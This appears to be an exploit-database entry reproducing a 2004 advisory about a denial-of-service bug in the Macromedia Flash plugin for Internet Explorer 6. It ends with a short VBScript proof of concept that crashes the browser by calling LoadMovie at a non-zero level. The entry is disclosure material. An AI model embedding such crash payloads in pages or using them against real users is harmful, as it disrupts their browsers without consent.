Microsoft Internet Explorer 6.0 Macromedia Flash Player Plugin - Remote Denial of Service

Author: Rafel Ivgi The-Insider
type: dos
platform: windows
port: 
date_added: 2004-04-06  
date_updated: 2013-01-06  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 23912.txt  

source: https://www.securityfocus.com/bid/10057/info

It has been reported that Macromedia Flash Player for Internet Explorer may be prone to a denial of service vulnerability that may cause an instance of Internet Explorer to crash. The issue is reported to exist in the 'LoadMovie' function by calling the function and loading a flash movie into a non-zero level in the following manner:

LoadMovie 1,"c6ool.swf"

This vulnerability is reported to be tested in Flash Player 7.0 r19 running on WindowsXP Professional SP1 and SP2.

<script language=vbscript>
Set mymy2= CreateObject("ShockwaveFlash.ShockwaveFlash.1")
mymy2.LoadMovie 1,"c6ool.swf"
</script>